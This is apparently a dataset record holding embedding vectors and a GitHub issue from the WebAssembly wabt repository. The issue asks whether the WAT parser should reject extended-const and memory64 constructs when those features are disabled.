-0.003226445522159338, -0.004882663022726774, 0.031733568757772446, -0.00188240478746593, -0.019291378557682037, 0.014805011451244354, -0.020891515538096428, 0.005035947076976299, -0.0011393503518775105, -0.018513740971684456, -0.010834576562047005, 0.026963066309690475, -0.011432758532464504, 0.029520295560359955, -0.001264594728127122, -0.010550440289080143, 0.006819278001785278, -0.0007201553671620786, -0.010744849219918251, -0.004561139736324549, 0.006497754715383053, 0.014161964878439903, 0.028264112770557404, -0.0009608302498236299, 0.011268259026110172, 0.009847575798630714, 0.004344298969954252, -0.00003867155101033859, 0.01692855916917324, -0.006295868661254644, 0.008015642873942852, -0.016779012978076935, -0.019336242228746414, 0.011402850039303303, -0.014266647398471832, -0.013795578852295876, 0.0281444750726223, 0.025153564289212227, 0.008082938380539417, -0.01049062144011259, 0.014423670247197151, 0.003561053890734911, -0.006938914302736521, -0.013122623786330223, -0.0263648834079504, 0.016599558293819427, 0.016165876761078835, 0.01248705480247736, -0.0147152841091156, -0.01274128258228302, -0.0045499238185584545, -0.011058894917368889, 0.008150233887135983, -0.0012842225842177868, -0.015126533806324005, 0.00016742093430366367, 0.004572355654090643, 0.01924651488661766, -0.012748760171234608, -0.011103758588433266, -0.0014664812479168177, 0.01724260486662388, 0.012831009924411774, 0.011200963519513607, -0.007320255506783724, -0.00757074449211359, -0.01120844017714262, 0.0010711201466619968, 0.005017254035919905, 0.00461721932515502, 0.013002987019717693, 0.007738983258605003, -0.02244679071009159, 0.007107153069227934, -0.005671515595167875, 0.024585291743278503, 0.02074197120964527, 0.015851831063628197, 0.013503964990377426, -0.016270557418465614, -0.02780052088201046, -0.008127802051603794, 0.010617735795676708, 0.0013393674744293094, 0.004886401351541281, 0.008950302377343178, -0.0017440752126276493, 0.015687329694628716, 0.0016393932746723294, -0.020936379209160805, -0.008254915475845337, 0.013631078414618969, 0.02739674784243107, -0.006366902496665716, 0.003615264082327485, -0.0040863328613340855, 0.003172235330566764, 0.016704240813851357, 0.02415161021053791, 0.009585871361196041, 0.006131368223577738, -0.016061194241046906, -0.01018405333161354, -0.006213618442416191, 0.0017898734658956528, -0.014730238355696201, -0.01996433362364769, -0.013803055509924889, 0.007495971396565437, 0.006965084932744503, -0.0034825424663722515, 0.01564246602356434, 0.020966289564967155, 0.009212006814777851, 0.014782579615712166, 0.003759201616048813, 0.007361380383372307, 0.0007598784286528826, 0.001725381938740611, 0.015089147724211216, -0.01583687588572502, -0.007159493863582611, 0.015717240050435066, 0.024510519579052925, 0.0014898477820679545, 0.017571603879332542, -0.0110364630818367, 0.005151845049113035, -0.017556650564074516, -0.0040115597657859325, -0.004471412394195795, 0.009189574979245663, -0.00023635209072381258, -0.026499474421143532, -0.006733288988471031, 0.01764637790620327, -0.024375928565859795, -0.009159666486084461, -0.02047278918325901, 0.008606347255408764, -0.012217872776091099, -0.024689974263310432, 0.0100868484005332, 0.004920049104839563, 0.0079558240249753, 0.006430459208786488, 0.005159322172403336, -0.012457146309316158, 0.01631542108952999, -0.009593348018825054, -0.005664038471877575, -0.00834464281797409, 0.006056595593690872, -0.016091102734208107, 0.02735188417136669, 0.003392815124243498, 0.012419759295880795, -0.005776197649538517, -0.009264348074793816, 0.0009024140308611095, -0.0018328678561374545, -0.015851831063628197, 0.013810533098876476, 0.0032563547138124704, 0.0049499585293233395, -0.0009813928045332432, 0.002271223347634077, 0.007432414684444666, 0.013421714305877686, 0.01187391858547926, 0.0038021961227059364, -0.004935003817081451, 0.00453870790079236, -0.015851831063628197, 0.011657076887786388, 0.0036489118356257677, 0.005637867841869593, 0.003276917152106762, 0.00409754877910018, -0.008150233887135983, 0.016165876761078835, 0.025901291519403458, 0.0034320708364248276, -0.00803807470947504, -0.007738983258605003, -0.008150233887135983, 0.016569649800658226, -0.0095036206766963, 0.010318644344806671, -0.03729666396975517, -0.006867880001664162, -0.00487892422825098, 0.008987688459455967, 0.009002643637359142, 0.0125693054869771, 0.00269182026386261, -0.010774758644402027, 0.0022861778270453215, 0.010774758644402027, 0.023807654157280922, 0.012464622966945171, 0.01924651488661766, -0.002542274771258235, 0.001808566739782691, -0.0025759225245565176, 0.0125693054869771, -0.013324510306119919, -0.017930513247847557, 0.004534969571977854, -0.006262220907956362, -0.02214769832789898, 0.014662942849099636, -0.00809041503816843, -0.0077763693407177925, 0.002321694977581501, 0.023359017446637154, -0.013002987019717693, 0.0015272340970113873, 0.014984466135501862, -0.0125693054869771, -0.004856492392718792, -0.025497520342469215, 0.0116346450522542, -0.011806623078882694, -0.0058547090739011765, -0.009473712183535099, -0.0006374379736371338, 0.003241400234401226, 0.0037498550955206156, -0.006034163758158684, -0.0030376443173736334, 0.009413893334567547, 0.009301734156906605, 0.005110719706863165, -0.023822609335184097, 0.03927066549658775, 0.015261124819517136, -0.023015063256025314, 0.01304785069078207, -0.00931668933480978, -0.004576094448566437, -0.017930513247847557, 0.011836531572043896, -0.021639244630932808, 0.004456458147615194, -0.006744504906237125, -0.003198405960574746, -0.0035928322467952967, 0.0038433209992945194, -0.0032488773576915264, 0.017975376918911934, -0.013189919292926788, -0.008897961117327213, 0.007458585314452648, 0.015081670135259628, 0.0032507467549294233, 0.00411250302568078, -0.003235792275518179, 0.000928584486246109, 0.009944780729711056, -0.017870696261525154, 0.01751178689301014, 0.006905266549438238, 0.016345331445336342, 0.042291488498449326, -0.01975497044622898, 0.006751982495188713, 0.014393760822713375, -0.004695730749517679, -0.012733804993331432, 0.0024114223197102547, 0.023224426433444023, -0.01785574108362198, -0.012322555296123028, 0.0073688579723238945, 0.018887605518102646, 0.0007977321511134505, 0.00766421016305685, 0.004075116943567991, -0.0183941051363945, 0.004101287107914686, -0.010348553769290447, 0.008239961229264736, -0.007402505725622177, 0.00419101445004344, 0.008524097502231598, -0.020457834005355835, -0.02371792681515217, -0.010056939907371998, 0.01386287435889244, 0.007604392245411873, 0.010363508015871048, 0.006557573098689318, -0.03950994089245796, 0.017766013741493225, 0.015657421201467514, -0.006621129810810089, 0.015657421201467514, 0.009974689222872257, 0.0063332547433674335, -0.008486711420118809, -0.011686986312270164, -0.002697428222745657, -0.0010234524961560965, 0.002045035595074296, -0.004037730395793915, 0.02135510742664337, -0.0017730495892465115, 0.00960830319672823, -0.004291957709938288, 0.014468533918261528, 0.00846427958458662, -0.009189574979245663, 0.005278958473354578, 0.008965256623923779, -0.00902507547289133, -0.051593221724033356, -0.026768656447529793, 0.006673471070826054, -0.020592425018548965, 0.0006481866003014147, -0.0053163450211286545, 0.013989987783133984, -0.016345331445336342, -0.012038418091833591, 0.006434198003262281, -0.0011496315710246563, 0.00046709622256457806, 0.0056266519241034985, 0.00034161817166022956, -0.030776478350162506, 0.0051443674601614475, 0.004381685052067041, 0.0026824737433344126, 0.010924303904175758, -0.006998732686042786, 0.011701940558850765, -0.005753765814006329, 0.018513740971684456, 0.012494532391428947, -0.003865752834826708, 0.017975376918911934, -0.002329172333702445, 0.011507531628012657, -0.014962034299969673, -0.01911192387342453, -0.0201736968010664, -0.0033124343026429415, 0.007282868959009647, 0.0030544681940227747, 0.0017665070481598377, -0.008920392952859402, -0.016539739444851875, -0.026140565052628517, -0.011402850039303303, -0.019605424255132675, 0.009772802703082561, -0.0022338370326906443, 0.010894394479691982, 0.012173009105026722, 0.00002969005254271906, 0.014468533918261528, 0.006183709483593702, 0.003553576534613967, 0.028503384441137314, -0.0037573324516415596, 0.004684514831751585, 0.005806106608361006, -0.01432646531611681, 0.014049805700778961, 0.014707806520164013, 0.013937646523118019, 0.010266303084790707, 0.007069766521453857, 0.005353731568902731, 0.009212006814777851, -0.01449844241142273, -0.007039857562631369, -0.04513285309076309, 0.02258138172328472, -0.006153800059109926, 0.006303345784544945, -0.015971466898918152, -0.012591737322509289, 0.003232053481042385, 0.006897789426147938, 0.016106057912111282, -0.00851661991328001, 0.023837564513087273, -0.002383382525295019, 0.003347951453179121, 0.011380418203771114, 0.011941214092075825, 0.014528351835906506, 0.002039427636191249, -0.0012374896323308349, -0.02054756134748459, -0.005241572391241789, 0.010879440233111382, 0.009817666374146938, 0.002278700703755021, 0.00265256455168128, 0.004389162641018629, 0.027606111019849777, -0.0056565613485872746, -0.008352120406925678, 0.011686986312270164, 0.007896006107330322, 0.019500741735100746, -0.010774758644402027, -0.005024731159210205, 0.002684342907741666, 0.013331986963748932, 0.004362992011010647, 0.0015879870625212789, 0.006486538797616959, 0.010213962756097317, -0.0013440408511087298, -0.0025553598534315825, -0.007432414684444666, -0.009870007634162903, -0.007881051860749722, 0.005211662966758013, -0.01091682631522417, 0.054225221276283264, 0.0026619110722094774, -0.01908201538026333, 0.014483488164842129, 0.002755377208814025, 0.01403485145419836, 0.010438281111419201, -0.012988032773137093, -0.0015562085900455713, -0.03373748064041138, -0.0066996412351727486, -0.020009197294712067, 0.0053013903088867664, -0.023015063256025314, -0.020398015156388283, 0.003605917561799288, -0.016973422840237617, 0.018558604642748833, -0.017691241577267647, -0.02105601690709591, -0.012816055677831173, -0.014685374684631824, 0.017736105248332024, 0.015881739556789398, -0.0030544681940227747, 0.011851486749947071, -0.020652243867516518, -0.003910616505891085, 0.0008173600072041154, -0.0367283932864666, 0.02596111036837101, -0.003774156328290701, -0.004688253626227379, -0.0034638491924852133, 0.004381685052067041, 0.02190842665731907, 0.005406072363257408, 0.02282065339386463, -0.014700328931212425, -0.008643734268844128, 0.00529765198007226, -0.014236737973988056, 0.005039685871452093, 0.008666166104376316, -0.007275391835719347, 0.02105601690709591, -0.005368685815483332, 0.02660415694117546, 0.015582648105919361, 0.004116241820156574, 0.008374552242457867, 0.01129069086164236, -0.014176920056343079, -0.0072380052879452705, 0.01204589568078518, 0.012105713598430157, 0.0036975140683352947, -0.015305988490581512, -0.01517887506633997, 0.012442191131412983, 0.019276423379778862, -0.014423670247197151, 0.006527664139866829, 0.027112610638141632, -0.026005974039435387, 0.0017244473565369844, 0.00731651671230793, 0.030193250626325607, -0.005312606226652861, 0.01277866866439581, 0.0011972992215305567, -0.013571260496973991, -0.0019141832599416375, -0.0030488602351397276, -0.006004254799336195, -0.008015642873942852, 0.022641198709607124, -0.019261470064520836, -0.008785801939666271, 0.00027198600582778454, 0.00744363060221076, 0.0019870868418365717, 0.005148106254637241, -0.005458413157612085, -0.010266303084790707, -0.02220751717686653, 0.0038545369170606136, -0.017496831715106964, 0.015687329694628716, 0.02681352011859417, 0.020083969458937645, 0.003884446108713746, -0.003944264259189367, -0.012404805049300194, -0.0016954728635028005, 0.012681464664638042, -0.016165876761078835, -0.0027871555648744106, 0.004602265078574419, 0.0017908081645146012, 0.0005930416518822312, 0.025497520342469215, -0.013690896332263947, -0.0015842483844608068, -0.00822500605136156, 0.0017384672537446022, -0.00282267271541059, -0.015051761642098427, -0.0063332547433674335, 0.01321982778608799, 0.003884446108713746, 0.027381792664527893, 0.00027782763936556876, -0.01333946455270052, -0.0018001548014581203, -0.0021441096905618906, 0.0041835373267531395, -0.005708902142941952, 0.011417804285883904, 0.004710685461759567, -0.02371792681515217, 0.02428620122373104, 0.01730242185294628, -0.01434141956269741, 0.016958467662334442, 0.025811564177274704, 0.011761759407818317, 0.017257558181881905, 0.022461744025349617, 0.012599213980138302, 0.0026563031133264303, -0.014662942849099636, 0.0004649932379834354, 0.014423670247197151, 0.0074099828489124775, 0.0029759567696601152, 0.005368685815483332, 0.029310930520296097, 0.006617391481995583, -0.0021927119232714176, -0.006961346138268709, 0.0453123077750206, -0.011380418203771114, 0.00350497430190444, -0.004254571627825499, 0.0010720548452809453, 0.003714337944984436, -0.002919877180829644, 0.004815367516130209, 0.0033255196176469326, 0.03508339077234268, 0.015463011339306831, -0.0014262908371165395, 0.014999420382082462, -0.01767628639936447, 0.010258826427161694, 0.0008309125551022589, 0.02319451794028282, 0.017451968044042587, 0.015851831063628197, 0.003555445931851864, 0.02374783717095852, 0.005368685815483332, 0.009645689278841019, -0.020771879702806473, -0.009982166811823845, 0.01751178689301014, 0.002646956592798233, -0.003561053890734911, -0.01692855916917324, -0.01287587359547615, -0.020756924524903297, -0.011200963519513607, -0.010348553769290447, 0.027262156829237938, 0.019814787432551384, 0.013279646635055542, -0.0032993489876389503, 0.024809610098600388, -0.007028641644865274, -0.013892782852053642, -0.016405148431658745, -0.027621066197752953, 0.0002302768116351217, 0.025093747302889824, -0.015283556655049324, -0.014378806576132774, -0.02425629086792469, -0.01655469462275505, -0.0024188996758311987, 0.0190072413533926, 0.006086504552513361, -0.009884961880743504, -0.01420682854950428, -0.005978084169328213, 0.02971470355987549, 0.03275047987699509, 0.005690209101885557, -0.00962325744330883, -0.014266647398471832, -0.0013926430838182569, -0.0030881159473210573, 0.02759115770459175, 0.0022263596765697002 ]
null
null
null
null
null
null
null
null
null
[ "WebAssembly", "wabt" ]
In some cases, WastParser rejects constructs that use disabled features (e.g. multi-memory, exceptions) and in some cases it appears to allow them (e.g. extended-const, memory64) even if disabled. (As seen in https://github.com/WebAssembly/wabt/pull/2234 where the lack of `--enable-extended-const` didn't affect `wast2json`.) Do we think it's important for `wat2wasm` to reject these constructs if disabled (and if so, should the spec testsuite or our regression tests include these kinds of negative examples)? Related to https://github.com/WebAssembly/wabt/issues/1837
Enforce disabled features in WastParser for extended-const and memory64?
https://api.github.com/repos/WebAssembly/wabt/issues/2235/comments
1
2023-05-11T20:50:28
2023-05-11T21:14:13Z
https://github.com/WebAssembly/wabt/issues/2235
1,706,536,550
2,235
false
This is a GitHub Issue repo:wabt owner:WebAssembly Title : Enforce disabled features in WastParser for extended-const and memory64? Issue date: --- start body --- In some cases, WastParser rejects constructs that use disabled features (e.g. multi-memory, exceptions) and in some cases it appears to allow them (e.g. extended-const, memory64) even if disabled. (As seen in https://github.com/WebAssembly/wabt/pull/2234 where the lack of `--enable-extended-const` didn't affect `wast2json`.) Do we think it's important for `wat2wasm` to reject these constructs if disabled (and if so, should the spec testsuite or our regression tests include these kinds of negative examples)? Related to https://github.com/WebAssembly/wabt/issues/1837 --- end body ---
759
[ -0.022921551018953323, 0.021040042862296104, -0.03201550617814064, 0.009594199247658253, 0.028804996982216835, 0.015380584634840488, -0.01859109476208687, 0.028192760422825813, -0.0033393041230738163, -0.012050612829625607, 0.028969256207346916, 0.04739609360694885, 0.013648401945829391, -0.002542276168242097, -0.0041139330714941025, -0.0035763592459261417, -0.006107436027377844, 0.034554049372673035, -0.004050469491630793, -0.0027102679014205933, 0.018830016255378723, 0.019382523372769356, 0.01111732516437769, 0.012707647867500782, 0.004797099623829126, 0.020248614251613617, -0.0017443150281906128, -0.007063122466206551, -0.022503437474370003, 0.011625033803284168, 0.005170414689928293, 0.021995728835463524, -0.005760252941399813, 0.028804996982216835, -0.009086490608751774, 0.0114234434440732, 0.03147793188691139, 0.016948508098721504, -0.032762136310338974, 0.004606708884239197, -0.020263547077775, -0.05805797129869461, 0.0012394062941893935, 0.01420090813189745, -0.03536041080951691, 0.00859371479600668, 0.004196062218397856, 0.007959078997373581, -0.015500045381486416, -0.03515135496854782, 0.00362675660289824, -0.04100493714213371, 0.03559933230280876, -0.06480751186609268, 0.051636952906847, -0.01773993670940399, 0.024519339203834534, -0.002512410981580615, 0.020233681425452232, 0.008586248382925987, -0.02166721224784851, -0.020218748599290848, -0.025773677974939346, 0.008235332556068897, 0.0016883177449926734, 0.03969086706638336, -0.02623658813536167, -0.001050882157869637, -0.02722214162349701, -0.0020569665357470512, -0.002170827705413103, 0.004326722584664822, -0.010572285391390324, 0.038227472454309464, 0.036853671073913574, -0.0037182189989835024, -0.00025595418992452323, 0.027401331812143326, 0.0004344455082900822, 0.005872247274965048, -0.024788126349449158, 0.034464456140995026, -0.028386883437633514, 0.022383976727724075, -0.013230289332568645, 0.021547751501202583, -0.02287675254046917, -0.044110920280218124, 0.027655186131596565, -0.052831560373306274, 0.01830737479031086, 0.047276630997657776, -0.011177055537700653, -0.019188398495316505, -0.01626160740852356, 0.05444428324699402, -0.07191543281078339, 0.025101710110902786, -0.02626645378768444, -0.012282068841159344, 0.01594802364706993, -0.0011143457377329469, 0.007996410131454468, 0.011274117976427078, 0.03989992290735245, -0.002909991657361388, 0.0026225389447063208, -0.014641419984400272, 0.04034790024161339, 0.11617567390203476, -0.02393696829676628, 0.015029667876660824, -0.02360844984650612, -0.014574223197996616, -0.01735168881714344, 0.015873359516263008, -0.009601665660738945, -0.022040527313947678, -0.021040042862296104, 0.030313190072774887, -0.01799379102885723, 0.01600775308907032, -0.01971103996038437, -0.028267422690987587, -0.003658488392829895, 0.027401331812143326, -0.006096236407756805, -0.012073012068867683, -0.003479297272861004, 0.016560260206460953, -0.006077570840716362, -0.0064732846803963184, -0.0056893229484558105, -0.045066606253385544, 0.04202035441994667, -0.015201392583549023, -0.0051442827098071575, 0.040497228503227234, -0.016216810792684555, -0.03111955150961876, -0.04154251143336296, -0.007406572811305523, 0.04118412733078003, 0.027057882398366928, -0.01782953180372715, 0.017277024686336517, -0.026281386613845825, 0.04261765629053116, 0.006973526906222105, 0.0021110970992594957, 0.02837195247411728, -0.014865409582853317, 0.019024139270186424, -0.009191019460558891, 0.0295217614620924, 0.025325700640678406, -0.00892969872802496, -0.022607965394854546, -0.019860366359353065, -0.006932462565600872, -0.004140065051615238, -0.030372921377420425, -0.026535240933299065, 0.017232228070497513, -0.0038862107321619987, 0.02220478467643261, 0.007410305552184582, 0.022861819714307785, 0.010206436738371849, 0.016978373751044273, 0.01690370962023735, -0.003721951972693205, -0.002428414998576045, -0.015253657475113869, -0.007742556277662516, -0.0036864872090518475, 0.01380519475787878, 0.037749629467725754, 0.03070143796503544, 0.00957180093973875, -0.0063986219465732574, -0.006659942213445902, 0.02335459552705288, -0.007966545410454273, 0.021607480943202972, -0.007275912445038557, -0.00577518530189991, 0.004812032449990511, 0.013745464384555817, -0.01063948217779398, -0.01270018145442009, -0.009646463207900524, -0.0248926542699337, 0.0026337383314967155, 0.015873359516263008, 0.027550658211112022, -0.04763501510024071, -0.055041585117578506, 0.008571315556764603, -0.008608647622168064, 0.045544449239969254, -0.0016565859550610185, 0.010348295792937279, -0.027595456689596176, -0.0155149782076478, 0.03114941716194153, 0.0013010032707825303, 0.047306496649980545, 0.026505375280976295, -0.03153766319155693, -0.001830177498050034, -0.03141820430755615, 0.0046589733101427555, -0.033986613154411316, 0.004819498397409916, 0.018904678523540497, -0.006995926145464182, 0.0002988854539580643, -0.02623658813536167, -0.000923488347325474, 0.005633325781673193, -0.007996410131454468, -0.0327322743833065, 0.012297000735998154, -0.0497853085398674, 0.04563404247164726, -0.021786672994494438, -0.02271249331533909, 0.004774700850248337, 0.05468320474028587, 0.0334191732108593, -0.02660990320146084, 0.020472602918744087, -0.007981478236615658, 0.006081304047256708, 0.018904678523540497, -0.019800635054707527, 0.0006500349845737219, -0.0027289337012916803, -0.0035539602395147085, 0.002659870544448495, 0.013767862692475319, -0.06005894020199776, -0.05907338857650757, -0.022070391103625298, 0.04527566209435463, -0.009900317527353764, 0.020397940650582314, 0.018770286813378334, 0.015619506128132343, 0.009004361927509308, -0.042229410260915756, -0.014962471090257168, -0.017725003883242607, 0.008728108368813992, -0.0022118922788649797, 0.006043972447514534, 0.02105497382581234, -0.01394705381244421, -0.027057882398366928, -0.0013943321537226439, -0.0032534415367990732, -0.029148446395993233, 0.013372148387134075, -0.02009928785264492, -0.02086085081100464, -0.030940359458327293, 0.028610873967409134, 0.019636377692222595, -0.017934059724211693, 0.04109453037381172, -0.02054726518690586, -0.05468320474028587, 0.02814796194434166, -0.017650339752435684, 0.014044116251170635, -0.004573110491037369, 0.0022436240687966347, 0.0030779833905398846, -0.03368796035647392, -0.026729365810751915, -0.00869077630341053, 0.009019293822348118, 0.018411902710795403, 0.04670919105410576, 0.026385914534330368, -0.004143798258155584, 0.05032288283109665, -0.05447414889931679, -0.023444192484021187, -0.014962471090257168, -0.01920333132147789, 0.006999658886343241, 0.010744010098278522, 0.017710071057081223, -0.03192591294646263, 0.01897934265434742, 0.0032086437568068504, -0.011341314762830734, 0.023563653230667114, -0.039063695818185806, 0.007003392092883587, 0.02769998461008072, 0.014462228864431381, -0.014783279970288277, -0.0017620475264266133, 0.012550855055451393, -0.00214842869900167, 0.013372148387134075, -0.03798855096101761, 0.04602229222655296, -0.01432783529162407, 0.009527002461254597, -0.0021782938856631517, -0.03512148931622505, 0.04518606513738632, 0.013416946865618229, -0.0050098891369998455, -0.051487624645233154, -0.01449209451675415, -0.015425382182002068, -0.01382012665271759, -0.056415386497974396, -0.018367106094956398, 0.026251520961523056, -0.04109453037381172, -0.008399590849876404, -0.0009650196880102158, -0.045006874948740005, -0.039153292775154114, 0.00846678763628006, -0.02949189767241478, -0.010490155778825283, -0.046918246895074844, -0.01380519475787878, -0.08236825466156006, -0.04312536492943764, 0.00004272708611097187, 0.01626160740852356, -0.03924288973212242, 0.01043042540550232, 0.016918642446398735, -0.008100938983261585, 0.010930667631328106, 0.004853096790611744, -0.02166721224784851, 0.005637058988213539, 0.0348825678229332, -0.013200423680245876, 0.02032327651977539, 0.0008889567106962204, -0.009818188846111298, -0.04802326112985611, 0.0341956689953804, 0.04151264578104019, -0.02368311397731304, 0.0007587630534544587, -0.028327153995633125, 0.006618877872824669, -0.04476795345544815, 0.007078055292367935, -0.05659457668662071, -0.023115674033761024, 0.016246674582362175, 0.026669634506106377, -0.005670657381415367, -0.0005632392130792141, -0.035420142114162445, -0.03933248296380043, -0.012834575027227402, 0.008825169876217842, -0.0030593175906687975, 0.003893677145242691, 0.02475826069712639, 0.014006784185767174, -0.00995258241891861, 0.022488504648208618, 0.0077724214643239975, 0.004998689983040094, 0.02054726518690586, -0.04294617474079132, 0.01603761874139309, 0.02814796194434166, -0.03754057362675667, 0.012274602428078651, -0.0147608807310462, 0.021592548117041588, 0.04850110411643982, -0.0003915142733603716, -0.01760554313659668, -0.01394705381244421, 0.03694326803088188, -0.050561804324388504, -0.04661959782242775, -0.052293986082077026, 0.02313060685992241, -0.03694326803088188, -0.043244827538728714, 0.011654899455606937, -0.030820898711681366, 0.019785702228546143, -0.05178627744317055, -0.003779815975576639, 0.031776584684848785, 0.005625859368592501, 0.016814114525914192, -0.058715008199214935, -0.02192106656730175, -0.002430281601846218, -0.03757043555378914, 0.018859881907701492, -0.022040527313947678, 0.022070391103625298, 0.02018888294696808, 0.022249583154916763, 0.0041288654319942, 0.007197516039013863, -0.000023128040993469767, -0.01715756393969059, 0.035868119448423386, -0.018367106094956398, 0.0165154617279768, 0.040079113095998764, 0.0005786385154351592, 0.010452824644744396, -0.008989429101347923, 0.004494714550673962, 0.011132257990539074, 0.03395674750208855, -0.028416749089956284, 0.013857458718121052, 0.01830737479031086, -0.006943661719560623, -0.034434590488672256, -0.03437485918402672, -0.028685536235570908, -0.041303589940071106, 0.009728592820465565, -0.010594683699309826, -0.029820414260029793, -0.011834090575575829, 0.0011423443211242557, -0.03425539657473564, -0.03291146457195282, 0.024698531255126, -0.019979827105998993, -0.0579683780670166, 0.01872548833489418, -0.007040723692625761, 0.009250749833881855, -0.018367106094956398, 0.02054726518690586, -0.02920817770063877, -0.0003348170139361173, 0.02428041771054268, -0.01530592143535614, -0.0026057397481054068, -0.028043434023857117, 0.010542419739067554, -0.010557352565228939, 0.0027998636942356825, 0.007533499971032143, 0.034464456140995026, 0.0039459411054849625, 0.030298257246613503, -0.0003583825600799173, -0.014014250598847866, -0.02587820589542389, 0.002490011975169182, 0.003860078752040863, 0.035420142114162445, -0.002473212778568268, 0.005282409489154816, 0.008533984422683716, 0.008324927650392056, -0.006936195772141218, -0.01270018145442009, -0.04145291447639465, -0.023399394005537033, -0.020442737266421318, 0.013872391544282436, -0.001893641077913344, 0.011684764176607132, -0.021293897181749344, -0.03306078910827637, -0.02422068640589714, 0.016052551567554474, 0.02853620983660221, 0.03577852249145508, 0.000603370601311326, 0.004311790224164724, -0.03353863209486008, -0.0010807473445311189, -0.03013399988412857, 0.03159739449620247, 0.0147608807310462, -0.009601665660738945, 0.000031119318009587005, 0.02828235551714897, 0.013760396279394627, -0.02498224936425686, -0.022533303126692772, 0.0003259507939219475, -0.021547751501202583, 0.04252806305885315, -0.03792881965637207, -0.04856083542108536, 0.041841160506010056, -0.038227472454309464, -0.03067157231271267, -0.02856607548892498, -0.06217937171459198, -0.00592077849432826, -0.01741141825914383, -0.012483658269047737, -0.0438421331346035, 0.010363228619098663, -0.0015996554866433144, 0.01936759054660797, 0.018665757030248642, 0.006536748260259628, -0.012767378240823746, -0.02141335792839527, 0.03984019160270691, 0.0036491556093096733, 0.03165712580084801, 0.01673945225775242, -0.009205951355397701, 0.01115465722978115, -0.03162726014852524, -0.016605058684945107, -0.006992192938923836, -0.01670958660542965, 0.04342401772737503, -0.00423339381814003, 0.019083870574831963, -0.02198079600930214, 0.017112767323851585, -0.00022422241454478353, 0.017262091860175133, -0.01185648888349533, 0.0348825678229332, -0.03760030120611191, 0.03703286498785019, 0.002560941968113184, 0.020950445905327797, -0.006402354687452316, -0.012647917494177818, 0.015425382182002068, 0.012207405641674995, -0.029312705621123314, -0.020905649289488792, -0.030283324420452118, 0.026818960905075073, -0.01073654368519783, -0.03035798855125904, 0.004950158763676882, 0.030402785167098045, 0.00577518530189991, -0.023653248324990273, 0.001002351171337068, -0.008825169876217842, 0.0008240931783802807, 0.022518370300531387, 0.016948508098721504, -0.019113736227154732, 0.017754869535565376, 0.019128669053316116, -0.008504118770360947, -0.031836315989494324, 0.014357700943946838, 0.0020121687557548285, -0.01741141825914383, 0.002820395864546299, -0.018382038921117783, -0.005435468629002571, -0.012005815282464027, 0.016410933807492256, 0.004143798258155584, 0.0007284312159754336, -0.010161638259887695, -0.01847163401544094, -0.0007004325743764639, 0.022802090272307396, 0.044558897614479065, -0.010893336497247219, 0.003053718013688922, -0.03105982020497322, 0.008713175542652607, -0.02290661819279194, 0.0020942979026585817, 0.01645573228597641, -0.03610704094171524, -0.02610219456255436, 0.05492212623357773, 0.012894305400550365, -0.02242877520620823, -0.005517597775906324, 0.01853136345744133, -0.026221657171845436, -0.0036808873992413282, 0.00969872809946537, 0.005323474295437336, -0.03697313368320465, -0.01606748439371586, 0.0009790189797058702, -0.05516104772686958, 0.01048268936574459, -0.020442737266421318, 0.013760396279394627, 0.04294617474079132, -0.017366621643304825, 0.026281386613845825, -0.018874814733862877, 0.005696789361536503, -0.033658094704151154, 0.02769998461008072, -0.014738482423126698, 0.014581689611077309, -0.00021605614165309817, 0.006831667385995388, -0.02761038951575756, 0.016246674582362175, -0.027789579704403877, 0.01738155260682106, -0.00379474856890738, -0.010505088604986668, 0.006309025920927525, 0.0002825529081746936, -0.028924457728862762, -0.03807814419269562, -0.016246674582362175, 0.006618877872824669, -0.03231415897607803, -0.02054726518690586, 0.01687384583055973, 0.03700299933552742, 0.012214872054755688, 0.0034923632629215717, -0.0007820952450856566, 0.006316492334008217, 0.03100009076297283, 0.009146220982074738, -0.003643555799499154, -0.020054489374160767, -0.008407057262957096, 0.0018591094994917512, 0.004912827629595995, 0.03138833865523338, 0.018620960414409637, -0.021264031529426575, 0.0008502252749167383, 0.013566272333264351, 0.029820414260029793, -0.0002582874149084091, 0.01620187796652317, 0.024355079978704453, 0.03285173326730728, -0.02304101176559925, 0.0050434875302016735, -0.035031892359256744, -0.006529281847178936, 0.0176354069262743, 0.02498224936425686, 0.0012496724957600236, 0.002992121037095785, -0.007921747863292694, -0.015634438022971153, -0.008884900249540806, 0.023668181151151657, 0.01687384583055973, -0.061014629900455475, 0.013245221227407455, -0.01766527257859707, -0.023787641897797585, -0.030074268579483032, -0.016724519431591034, 0.0371224582195282, -0.007697758264839649, 0.01420090813189745, 0.007022058125585318, 0.013887323439121246, 0.005629592575132847, 0.009123822674155235, -0.015544842928647995, -0.0036808873992413282, -0.0006439686403609812, 0.01552991010248661, -0.0007218981627374887, -0.008227866142988205, 0.05059166997671127, 0.006197031587362289, 0.011214387603104115, 0.02051740139722824, 0.010310964658856392, 0.0319557785987854, 0.006170899607241154, -0.01051255501806736, -0.002508677775040269, 0.027207208797335625, 0.0010732810478657484, 0.019636377692222595, -0.021398425102233887, -0.015134196728467941, 0.002071899129077792, -0.003695819992572069, 0.009833120740950108, -0.014462228864431381, -0.009146220982074738, 0.025519823655486107, -0.03521108627319336, 0.011490640230476856, -0.016127213835716248, -0.01661999151110649, 0.0035035626497119665, -0.022085323929786682, 0.029865212738513947, 0.005887180101126432, -0.016545327380299568, -0.0385858528316021, -0.0176354069262743, -0.020039556547999382, -0.032702408730983734, -0.023235134780406952, -0.007324443198740482, -0.02086085081100464, 0.006992192938923836, 0.012856974266469479, -0.03416580334305763, 0.010139239951968193, -0.001640720060095191, -0.021935997530817986, 0.005017355550080538, -0.005905845668166876, -0.037809357047080994, 0.009780856780707836, -0.04157237708568573, 0.04485755041241646, 0.030567044392228127, -0.04802326112985611, 0.02374284341931343, 0.017053036019206047, 0.005062153562903404, -0.035390276461839676, -0.002473212778568268, -0.005633325781673193, 0.010124307125806808, 0.016784248873591423, -0.018322307616472244, 0.015365651808679104, -0.018576161935925484, -0.012916704639792442, 0.00020543999562505633, -0.025131575763225555, -0.0075969635508954525, 0.017291957512497902, 0.003949674312025309, 0.020009692758321762, 0.0013570005539804697, -0.024011630564928055, -0.0050770859234035015, 0.003931008744984865, 0.005771452095359564, 0.039063695818185806, 0.010893336497247219, -0.00598424207419157, 0.006779402960091829, -0.011318915523588657, 0.02808823250234127, -0.021323760971426964, 0.008608647622168064, -0.009019293822348118, 0.009123822674155235, 0.0035035626497119665, 0.010057110339403152, -0.009437407366931438, -0.018934544175863266, -0.006753270979970694, -0.0032310427632182837, 0.005457867402583361, -0.03694326803088188, -0.004756034817546606, -0.035061758011579514, -0.0017695138230919838, -0.021114705130457878, 0.005801317282021046, -0.01696344092488289, 